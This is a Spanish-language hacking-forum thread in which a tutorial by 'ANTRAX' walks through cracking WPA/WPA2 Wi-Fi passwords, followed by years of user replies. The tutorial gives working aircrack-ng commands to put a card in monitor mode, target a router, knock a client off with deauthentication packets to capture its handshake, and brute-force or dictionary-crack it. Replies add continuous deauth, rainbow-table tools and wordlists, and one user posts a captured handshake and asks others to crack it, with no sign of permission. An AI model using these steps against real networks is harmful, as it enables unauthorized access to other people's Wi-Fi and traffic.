Underc0de

[In]Seguridad Informática => Seguridad Wireless => Mensaje iniciado por: ANTRAX en Marzo 12, 2013, 05:28:20 PM

Título: Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Marzo 12, 2013, 05:28:20 PM
Introducción

Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo.
Para lo que no sepan lo que es el Handshake se genera en el momento en el que un dispositivo se conecta en una red. La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres, por lo que parece imposible crackear la clave.

(https://lh4.googleusercontent.com/-tT7HGKNXJvE/VChO8zZiSeI/AAAAAAAACAU/v64d5QtEaxA/w586-h417-no/2.png)

Como se muestra en la imagen, el dispositivo envía una solicitud de conexión al router, el router responde pidiendo la clave de acceso, el dispositivo envía la clave de acceso. El router responde a esa autenticación, si es correcta se produce la asociación a la red y el router responde con un OK, es decir, lo asocia a la red.

Esta negociación que se produce, es el Handshake (Apretón de manos) y lo que haremos en este taller, será capturarlo y descifrarlo, ya que la contraseña viene cifrada dentro de él.

No hay ninguna diferencia entre el crackeo de redes WPA o WPA2. El método de autenticación es básicamente el mismo. Por lo que las técnicas a usar son idénticas.

Colocando nuestra interface en modo monitor

Lo que haremos ahora será ver el nombre de nuestra interface, para ello tipeamos lo siguiente:

airmon-ng

(https://lh4.googleusercontent.com/-hq6yQqNbeAw/VChO68-1cgI/AAAAAAAACAI/JsLMH3FQJRk/w569-h147-no/3.png)

En mi caso figuran dos interfaces:

Wlan2: La placa de red que tiene mi notebook
Wlan1: Mi USB Wifi externo

Debido a que la placa de mi notebook no sirve para usarla con aircrack, usaré mi USB Wifi externo, es decir, la Wlan1
Ahora la pondremos en modo monitor con el siguiente comando:

airmon-ng start wlan1

(https://lh6.googleusercontent.com/-VS6BlbQvt2c/VChO8zuasNI/AAAAAAAACAc/NyiytiCuQ-g/w620-h326-no/4.png)

Como muestra la imagen, la coloca en modo monitor
(Monitor mode enablen on mon0)

Scanneo de las redes cercanas

Para ver las redes que tenemos cerca, lanzaremos el siguiente comando:

airodump-ng mon0

(https://lh4.googleusercontent.com/-qX1sCtPPqE8/VChO9pM3iDI/AAAAAAAACAo/x_IsHb5s9cA/w684-h292-no/5.png)

Como bien dijimos al principio de este taller, el Handshake se genera a la hora de que un cliente se conecta a la red. Es por ello, que nuestro objetivo ahora será tirar a un cliente conectado, y cuando intente conectarse nuevamente, capturaremos ese Handshake.

Lo que debemos recordar de esta consola, son los siguientes datos:

BSSID (MAC del router)
STATION (MAC del Cliente conectado)
CH (Canal)

Frenamos el scanneo con la siguiente combinación de teclas CTRL + C

Seguido a esto, colocamos el siguiente comando:

airodump-ng mon0 --channel 1 --bssid D8:5D:4C:C7:DC:EE -w /underc0de

Explicaré brevemente los parámetros de este comando:

mon0 (Nuestra interface en modo monitor)
--channel (Canal)
--bssid (MAC del router al que atacaremos)
-w (Nombre del archivo en donde se guardará el handshake)

Volveremos a ver la misma pantalla que la anterior, pero esta vez solo observaremos el movimiento que está generando el router al que atraparemos.

Capturando el Handshake

En una nueva consola, procederemos a conectar uno de los clientes conectados para capturarle el Handshake, para ello, tipearemos el siguiente comando:

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0

(https://lh6.googleusercontent.com/-EXaZompuyjs/VChO-BlP97I/AAAAAAAACA0/MCvMeGHSvho/w684-h236-no/6.png)

En caso de que al tipear el comando, aparezca un error como el de la imagen, al mismo comando le añadimos --ignore-negative-one

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0 --ignore-negative-one

Esto sucede porque tenemos que aplicarle un parche a nuestro kernel, pero la forma más rápida es añadiendo la extensión al comando como hicimos.

Al ejecutar el comando, veremos como desconecta al cliente conectado, y en la otra consola podremos ver lo siguiente en la parte superior:

(https://lh3.googleusercontent.com/-Vh2-eJYVct8/VChO-ogkWeI/AAAAAAAACA4/RD0HEWh_AQ0/w684-h41-no/7.png)

Como podemos observar, aparece el [WPA handshake D8:5D:4C:C7:DC:EE]

Eso quiere decir que ya capturamos el Handshake de la red. Ahora podemos cerrar todas las consolas activas e iniciar el proceso de cracking.

Crackeando el Handshake por Fuerza bruta

Para crackear el handshake por fuerza bruta, utilizaremos John The Ripper, el cual es un excelente para este tipo de tareas.

En una consola tipeamos lo siguiente

john –stdout:XX --incremental:YY | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /underc0de*.cap

En el comando se pueden reemplazar las XX por:

alpha  (solo letras)
digits  (solo números)
alnum   (numeros y letras)
all  (Todos los caracteres incluidos ",.-#%&)

Las YY son los números de caracteres que puede tener la contraseña, si colocamos 8, John the ripper combinará desde 1 hasta 8 caracteres.

(https://lh5.googleusercontent.com/-13SO7Vv7YK0/VChO_S6KA5I/AAAAAAAACBI/6RQn8s6Hj18/w684-h462-no/8.png)

Lo malo de esto, es que puede demorar desde minutos a años en sacar una clave. Y depende mucho del hardware que tengamos en nuestra pc.

Crackeando el Handshake por Diccionario

Para poder romper la clave por diccionario, colocaremos en la consola el siguiente comando:

aircrack-ng -w diccionario.txt -b D8:5D:4C:C7:DC:EE /underc0de*.cap

Rapidamente explicaré los parámetros del comando

-w (Nombre del diccionario)
-b (MAC del router)

Y finalmente el nombre del Handshake

(https://lh3.googleusercontent.com/-JRMEMBTGNEs/VChO_vG_TxI/AAAAAAAACBE/OHoSNo8Fm4c/w684-h462-no/9.png)

VERSIÓN PDF (http://underc0de.org/talleres/Taller_Wireless_4.pdf)
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: shoogode en Marzo 21, 2013, 01:43:20 AM
antrax todo bien pero donde nos bajamos backtrack final soy medio novato en esto de backtrack pero se que algun dia lo comprendere ayudame porfa pon un link del software para descargarlo ya que he visto que hay varias versiones pero para empezar a entenderlo dime cual es.
uso sistema operativo windows 8 pro cual es el adecuado para este s.o
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: aika en Marzo 21, 2013, 03:31:42 AM
back track es un sistema operativo,para descargarlo basta con teclear en google backtrack, cualquier distribucion es buena y para empezar es necesario aprender desde cero,y si quieres instalarlo en windows 8 deveras tenerlo como maquina virtual, si esque realmente quieres aprender empieza por estudiar un poco sobre todo esto podrias empezar a buscar informacion sobre maquinas virtuales o programas para crearlas,tambien busca informacion sobre los diferentes (os) sistemas operativos y aprende primero a usar el que ya tienes que es windows 8 no intentes dar pasos de gigante ya que cometeras graves errores lo digo por experiencia propia y buen aporte :)
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: andy007 en Abril 04, 2013, 09:42:14 AM
y si la clave no esta en el diccionario que hago?
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Abril 04, 2013, 10:03:44 AM
anddy buenas si no esta en el diccionario tienes que hacerlo por fuerza bruta o por medio de un rainbow tables ;)

Regards,
Snifer
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: blozzter en Abril 04, 2013, 11:49:46 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y si la clave no esta en el diccionario que hago?

ANTRAX lo dice en el tutorial, puedes usar John The Ripper.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: polo93 en Abril 06, 2013, 05:58:01 PM
Funcionara con organge y vodafone?
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Abril 06, 2013, 06:04:25 PM
Si, con todos los routers
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Cl0udswX en Abril 06, 2013, 10:21:05 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y si la clave no esta en el diccionario que hago?

ANTRAX lo dice en el tutorial, puedes usar John The Ripper.

Pues basicamente Jhon funciona tambien con un wordlist.

Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Abril 06, 2013, 10:32:34 PM
Si, pero si colocas lo siguiente:

/pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap

le estas diciendo al john que combie variaciones de caracteres incluyendo numeros, letras, y caracteres especiales.
John probara todas las combinaciones posibles entre ellos hasta encontrar la password
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Anton en Mayo 20, 2013, 05:28:46 PM
Antrax te equibocaste en el post,al principio pusiste el comando ''aminon-ng'' y es ''airmon-ng''
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Mayo 20, 2013, 05:35:38 PM
Muchas gracias! se me habia pasado!
Ya lo arregle
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Mr. Foster en Junio 20, 2013, 01:34:58 PM
A la fecha es más fácil ocupar Xiaopan para obtener la contraseña de las señales wpa y wpa2, es lo que he estado utilizando bastante ahora que me cambie de casa XD.
Se viene un tutorial para el foro  ;D
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: hum4n3xpl01t en Junio 21, 2013, 06:51:39 AM
Excelente..

Agregare este hilo a los de 5 estrellas :D

Muchas gracias Antrax.
saludos.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: z0mbie.r00t en Junio 21, 2013, 05:04:05 PM
(http://3.bp.blogspot.com/-aEtla6xEaSw/TtP1RIdQpdI/AAAAAAAAAa4/kN6Ma38ti0E/s1600/snapshot7.png)

Hola... en esa parte no me arroja el "Handshake" iba bien hasta ahì.. que hago ?
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Junio 21, 2013, 08:48:51 PM
Esperar hasta que te lanze :P si no aparece aun nada es porque no hay usuarios conectados
Regards,
Snifer
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snake0.0 en Julio 13, 2013, 08:55:33 PM
jaja mas completo que todos los vídeos que vi ;D ;D
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Julio 15, 2013, 10:34:47 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(http://3.bp.blogspot.com/-aEtla6xEaSw/TtP1RIdQpdI/AAAAAAAAAa4/kN6Ma38ti0E/s1600/snapshot7.png)

Hola... en esa parte no me arroja el "Handshake" iba bien hasta ahì.. que hago ?

Donde lanzas -0 1 cambialo por -0 0 para que envie los paquetes de forma recursiva y no lanzes a cada momento la desautenticacion!

Regards,
Snifer
Título: Sin imagenes
Publicado por: tracker2050 en Mayo 27, 2015, 03:30:09 AM
se que es un post viejo y posiblemente ya todos se pueden estos pasos de Pe a Pa pero me gustaria que pudieran arreglar lo de las imagenes para poder empezar en este mundo sobre seguridad wireless.
Título: Re:Sin imagenes
Publicado por: rand0m en Mayo 27, 2015, 03:48:32 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
se que es un post viejo y posiblemente ya todos se pueden estos pasos de Pe a Pa pero me gustaria que pudieran arreglar lo de las imagenes para poder empezar en este mundo sobre seguridad wireless.

http://www.wifislax.com/

De aquí te podrás bajar la imagen Live que mejores resultados me dio. (Aunque cada uno lo hará a su manera).
De todas formas, Kali Linux es el mismo BackTrack del que habla Don A., pero en vez de ser "un ubuntu modificado" ahora es "un debian modificado", lo que le da muchísima estabilidad.
Para acercarte un poco "a todo" y toquetear cuantas herramientas quieras yo te recomendaría Kali Linux.

https://www.kali.org/

-- EDIT

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
date=1373895287

Nos van a matar. ¿Por qué no abriste un post nuevo?
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Mayo 27, 2015, 08:05:52 AM
Revisa ahora por favor.

Saludos!
ANTRAX
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Chompiras en Abril 05, 2016, 12:44:02 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
anddy buenas si no esta en el diccionario tienes que hacerlo por fuerza bruta o por medio de un rainbow tables ;)

Regards,
Snifer

Antrax, como seria el método del rainbow tables? La verdad que estuve leyendo un poco pero me mareo...
Saludos!
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Abril 09, 2016, 08:00:47 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
anddy buenas si no esta en el diccionario tienes que hacerlo por fuerza bruta o por medio de un rainbow tables ;)

Regards,
Snifer

Antrax, como seria el método del rainbow tables? La verdad que estuve leyendo un poco pero me mareo...
Saludos!

Donde te mareas?

El rainbow tables son tablas arcoiris en español cuyo objetivo es tener el hash del password con el fin de hacer el machado directo de hash y no asi probar la contraseña, es decir por ejemplo si el md5 de 2 es aaaaaabc tu tienes un Rainbow table de todos los numerosno tendras 1,2,3,4,etc si no, aaabc, aaaaaaaabc, aaabcc,etc siendo mas rápido la comprobacion, no se si me deje entender.

Regards,
Snifer
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: RisingMage en Abril 09, 2016, 11:51:05 AM
Snifer que tal.

Perfectamente explicado. Me surge una curiosidad leyendo tu explicación, ¿se podría usar un pyrit para calcular hashes por rainbow tables?

Un saludo.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Abril 10, 2016, 01:56:13 PM
Pyrit, Cowpatty, genpmk por mencionar algunas y lo que haras es desde tu diccionario pasarlo a la tabla de arcoiris.

Regards,
Snifer
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Chompiras en Abril 12, 2016, 08:41:32 PM
Estimados,
Tengo el siguiente Handshake y no logro descifrar su contraseña por ningún método  :-[ :-\. Algún alma caritativa podría darme una mano o bien guiarme en el proceso. Cual convendría llevar a cabo para lograrlo?

Adjunto Handshake
https://mega.nz/#!fthXzKLT!XfTEVXdcptBeDvO-nsl5wgvwC4o3ZiChQ8FvztpJkL0

Saludos y muchas gracias!
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Snifer en Abril 13, 2016, 09:58:12 AM
Chompiras sabes la longitud de la contrasenia? cuantos caracteres numericos, alfabeticos, especiales? si no das eso con gusto te colaboramos.

</IRONIA OFF>

Recuerda que depende mucho la ruptura del Handshake a la longitud de la contrasenia probaste con que diccionarios?.

Regards,
Snifer
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Chompiras en Abril 13, 2016, 02:43:03 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Chompiras sabes la longitud de la contrasenia? cuantos caracteres numericos, alfabeticos, especiales? si no das eso con gusto te colaboramos.

</IRONIA OFF>

Recuerda que depende mucho la ruptura del Handshake a la longitud de la contrasenia probaste con que diccionarios?.

Regards,
Snifer

Mmmmm... Nop, lamentablemente son datos de los que no dispongo.
Con diccionarios intente pero no he tenido éxito. Creería que tampoco dispongo de diccionarios muy buenos en español.
Que diccionarios me recomendarías?

Desde ya, gracias por la respuesta!
Saludos.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Stiuvert en Abril 13, 2016, 04:07:13 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Creería que tampoco dispongo de diccionarios muy buenos en español.
Que diccionarios me recomendarías?
Saludos.

Puedes crear tus propios diccionarios con "Crunch (https://underc0de.org/foro/hacking/aprende-a-usar-crunch-paso-a-paso)", es lo más recomendado si tienes idea de como puede ser la clave que quieres conseguir.

Y sino tienes diccionarios específicos, como palabras en español, combinaciones alfanuméricas, etc. Diccionarios (Ataque de Fuerza Bruta) (https://underc0de.org/foro/wireless/diccionarios-(ataque-de-fuerza-bruta))

Saludos
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Toshayx en Abril 20, 2016, 09:54:11 AM
Despues de leer los talleres de seguridad wireless y alguno de estos post, tras tener claros todos los conceptos me encuentro con el siguiente problema.
Al capturar el trafico de un AP mediante airodump-ng RRR --channel 1 --bssid YYYY -w /ruta nunca consigo que me aparezcan los clientes que tiene conectado dicho ap, estas pruebas las he realizado en varios AP y siempre igual, cerciorandome de que son AP con clientes conectados.
No soy un virtuoso de la informatica y mis conocimientos son muy escasos, si alguien puede echarme un cable ya que despues de buscar por ahi no logre encontrar nada.
Estoy usando kali linux en virtualbox con una tarjeta Ralink 8002.11 n WLAN

Edit
Creo que he dado con el problema, ya que no estaba realizando el proceso correctamente, me he encontrado con este otro problema.
Segun entiendo el modo station esta deshabilitado, es posible habilitarlo?
Gracias


(https://i.gyazo.com/053e508d8d99f0d7180f464019240b19.png)
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: rush en Abril 20, 2016, 11:48:59 AM
tienes que usar la interfaz wlan0mon ya que es la que esta en modo monitor, en realidad seria mejor si pusieras los pasos que realizas para empezar a capturar trafico.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Toshayx en Abril 21, 2016, 04:24:03 PM
Buenas rush, te dejo aqui los pasos previos que realizo con algunas capturas. Gracias por la respuesta.
En primer lugar comienzo a hacer el escaneo de la red, concretamente del canal 1 que es donde esta mi AP

(https://i.gyazo.com/b531b0e40a53c04a7eeb025fed05ca49.png)

Una vez hecho esto, obtengo la MAC de mi AP y capturo trafico del mismo, es en este punto donde no consigo ver ninguna station, a sabiendas de que tengo clientes conectados, lo he probado con otros AP y nada.
airodump-ng -c 1 -w /ruta --bssid mac ap wlan0mon
(https://i.gyazo.com/60561df3f150d7357cda813c75386bdd.png)

Un saludo y gracias
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Stiuvert en Abril 21, 2016, 05:40:09 PM
¿Por qué en la interfaz pones "wlan0mon"?

Quizás este ahí el problema, deberías ponerlo de la siguiente forma

airodump-ng –w Stiuvert –c1 –BSSID wlan0
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: rush en Abril 21, 2016, 06:58:27 PM
Citar¿Por qué en la interfaz pones "wlan0mon"?

Quizás este ahí el problema, deberías ponerlo de la siguiente forma

Código: [Seleccionar]
airodump-ng –w Stiuvert –c1 –BSSID wlan0

Por que al parecer es esa interfaz la que se levanta en modo monitor, pero para estar seguros despues de hacer el airmon-ng start wlan0, ejecuta iwconfig o ifconfig, para saber que interfaz es la que se encuentra en modo monitor.

Tal vez no se puede poner en modo monitor tu tarjeta de red, antes de inciiar monitor ejecuta "man rfkill"
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Toshayx en Abril 22, 2016, 02:33:25 PM
Al parecer mi interface se levanta con ese nombre, al darle a iwconfig tras habilitar el modo monitor me sale solo wlan0mon, luego hare el comando que me has dicho y te mando en detalle el iwconfig, espero que no me toque comprar otra, de ser asi, conoceis algunas tarjetas que cumplan perfectamente esta funcion?
quizas tiene algo que ver con el driver o algo asi... no tengo mucha idea de como funcionan los drivers en linux
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Stiuvert en Abril 22, 2016, 04:38:24 PM
Haz la prueba de inyectar paquetes en una red con clave WEP, si consigues inyectar paquetes significa que el chipset de tu tarjeta WiFi es bueno.


Saludos
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Andrux en Mayo 22, 2016, 04:47:39 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
y si la clave no esta en el diccionario que hago?
Hay un pequeño detalle en esa parte de la información Donde va incremental lleva el tipo de caracter (digits,all,alpha) y donde va stdout va el numero máximo de caracteres hasta el que vas a explorar (8,9,10...)

Y se escribiría de la siguiente forma:

john --incremental= all --stdout= 11 

prueba así si te sale el problema que te tira diccionario 0 (cero) es por que algo esta mal escrito, recordemos que a medida que avanza kali (u otros programas) por ahí cambian algunas cosas en caso que no te funcione como te dije proba quitandole un guión a stdout   ( quedaria   -stout).

Cualquier duda puedes enviarme un mp y una vez que resolvamos el problema subimos un Screen al foro para que quede registrado.


Saludos  ;)
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: tesla en Agosto 24, 2016, 10:50:31 AM
buen turorial loco.puedo tener el wordlist :)
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: n3x0 en Noviembre 16, 2016, 02:13:03 PM
Citarjohn --stdout:alnum --incremental:12 | aircrack-ng -b XXX -w - /pw*.cap
Invalid option parameter: "--stdout:alnum"
Opening /pw-01.cap
Opening /pw-02.cap

Invalid packet capture length -533424156 - corrupted file?
Opening /pw-03.cap

Buenas, una consulta, tengo 2 problemas, el primero es el parámetro invalido, el cual probé variación tales como "--stdout:alnum", "-stdout:alnum", "–stdout:alnum" y ninguna funciona..

Y segundo es el error "Invalid packet capture length -533424156 - corrupted file?"

Busque información pero no encontré una solución, es algo que se me va de rango, pero no se que...

Citar
         if( pkh.caplen <= 0 || pkh.caplen > 65535 )
         {
            fprintf( stderr, "\nInvalid packet capture length %d - "
               "corrupted file?\n", pkh.caplen );
            eof_wait( &eof_notified );
            _exit( FAILURE );
         }

Gracias!!


Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Noviembre 16, 2016, 03:10:44 PM
Hola @n3x0 (https://underc0de.org/foro/index.php?action=profile;u=63052)
Este tutorial era para la primera versión de Kali, pero ya los parámetros cambiaron, es por ello que no funcionan alguno de ellos.

Saludos,
ANTRAX
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: n3x0 en Noviembre 16, 2016, 03:29:17 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @n3x0 (https://underc0de.org/foro/index.php?action=profile;u=63052)
Este tutorial era para la primera versión de Kali, pero ya los parámetros cambiaron, es por ello que no funcionan alguno de ellos.

Saludos,
ANTRAX

Recién veo el a;o del post!, gracias por contestar.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: Dorito en Mayo 29, 2017, 10:46:17 PM
Hola. que diccionario es el mas completo para este proceso, que no se  john

Gracias.
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: ANTRAX en Mayo 29, 2017, 11:18:02 PM
Hola John no es un diccionario.
El más común es rockyou.txt (viene con kali o lo podes descargar googleandolo)

Saludos,
ANTRAX
Título: Re:Crackeando redes con WPA/WPA2 desde cero by ANTRAX
Publicado por: hugo10 en Julio 03, 2017, 07:19:54 PM
Siempre es Bueno aprender Nuevas cosas y actualizarse con Tecnologias!